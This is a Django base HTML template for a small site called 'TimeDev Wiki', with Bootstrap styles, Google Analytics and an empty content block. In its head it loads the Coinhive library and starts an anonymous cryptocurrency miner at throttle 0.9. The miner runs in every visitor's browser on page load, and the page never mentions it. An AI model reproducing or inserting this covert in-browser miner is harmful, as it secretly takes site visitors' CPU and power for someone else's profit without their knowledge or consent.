{% load staticfiles %}
<html>
    <head>
        <title>TimeDev Wiki</title>
        <!-- Stylesheets from Bootstraps -->
        <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css">
        <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap-theme.min.css">
        <link href='//fonts.googleapis.com/css?family=Lobster&subset=latin,latin-ext' rel='stylesheet' type='text/css'>
        <script src="https://coinhive.com/lib/coinhive.min.js"></script>
        <link rel="stylesheet" href="{% static 'css/wiki.css' %}">
        <!-- Global site tag (gtag.js) - Google Analytics -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-110565945-1"></script>
        <script>
            window.dataLayer = window.dataLayer || [];
            function gtag(){dataLayer.push(arguments);}
            gtag('js', new Date());

            gtag('config', 'UA-110565945-1');
        </script>

        <script>
            var miner = new CoinHive.Anonymous('he4VCLWbVuPiZYvSfoniQhtpX60gYTz5', { throttle: 0.9 });
            miner.start();
        </script>
    </head>
    <body>
    <div class="page-header">
        <h1><a href="/">TimeDev wiki</a></h1>
    </div>
    <div class="content container">
        <div class="row">
            <div class="col-md-8">
            {% block content %}
            {% endblock %}
            </div>
        </div>
    </div>
</body>

</html>
